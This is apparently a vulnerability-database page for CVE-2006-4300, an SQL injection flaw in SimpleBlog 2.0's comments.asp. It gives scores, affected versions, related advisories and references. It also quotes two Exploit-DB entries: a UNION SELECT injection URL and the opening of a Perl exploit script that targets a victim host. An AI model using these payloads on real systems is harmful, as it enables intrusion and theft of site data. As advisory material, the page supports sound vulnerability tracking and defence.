CVE-2006-4300
published 2006-08-23CVE-2006-4300: SQL injection vulnerability in comments.asp in SimpleBlog 2.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.67%
73.9th percentile
SQL injection vulnerability in comments.asp in SimpleBlog 2.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 8pixel.net | simple_blog | <= 2.0 | — |
| 8pixel.net | simple_blog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jfpf-5jr9-pf7p: SQL injection vulnerability in comments_get
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-4055 [HIGH] GHSA-jfpf-5jr9-pf7p: SQL injection vulnerability in comments_get
SQL injection vulnerability in comments_get.asp in SimpleBlog 3.0 allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: this may be related to CVE-2006-4300.
GHSA
GHSA-pfr2-pvxj-3p32: SQL injection vulnerability in comments
ghsa_unreviewed·2022-05-01
CVE-2006-4300 [HIGH] GHSA-pfr2-pvxj-3p32: SQL injection vulnerability in comments
SQL injection vulnerability in comments.asp in SimpleBlog 2.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
No detection rules found.
Exploit-DB
SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)
exploitdb·2006-08-20
CVE-2006-4300 SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)
SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)
---
################################################################################
## ##
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | [email protected] ##
## Googledork | Powered By SimpleBlog 2.0 ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uF
Exploit-DB
SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)
exploitdb·2006-08-20
CVE-2006-4300 SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)
SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)
---
#!/usr/bin/perl
#Method found by Chironex Fleckeri
#Exploit By ASIANEAGLE
#Contact:[email protected]
#Original advisory: http://www.milw0rm.com/exploits/2228
#Usage: exploitname.pl
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print " *****SimpleBlog 2.0 SQL Injection Exploit***** \r\n";
print " *****www.asianeagle.org***** \r\n";
}
sub usage()
{
header();
print " *Usage: $0 \r\n";
print " * = Victim's host ex: www.site.com\r\n";
print " * = SimpleBlog Path ex: /SimpleBlog/\r\n";
print " * = Admin ID ex: 1\r\n";
exit();
}
sub exploit ()
{
$simserver = $ARGV[0];
$simserver =~ s/(http:\/\/)//eg;
$simhost = "http://".$simserver;
$simdir = $ARGV[1];
$simport = "80";
$simtar = "comments.asp?id=";
$simsql
No writeups or analysis indexed.
http://secunia.com/advisories/18488/http://securityreason.com/securityalert/1440http://www.securityfocus.com/archive/1/443923/100/0/threadedhttp://www.securityfocus.com/bid/19609/infohttps://exchange.xforce.ibmcloud.com/vulnerabilities/28470https://www.exploit-db.com/exploits/2228https://www.exploit-db.com/exploits/2232http://secunia.com/advisories/18488/http://securityreason.com/securityalert/1440http://www.securityfocus.com/archive/1/443923/100/0/threadedhttp://www.securityfocus.com/bid/19609/infohttps://exchange.xforce.ibmcloud.com/vulnerabilities/28470https://www.exploit-db.com/exploits/2228https://www.exploit-db.com/exploits/2232
2006-08-23
Published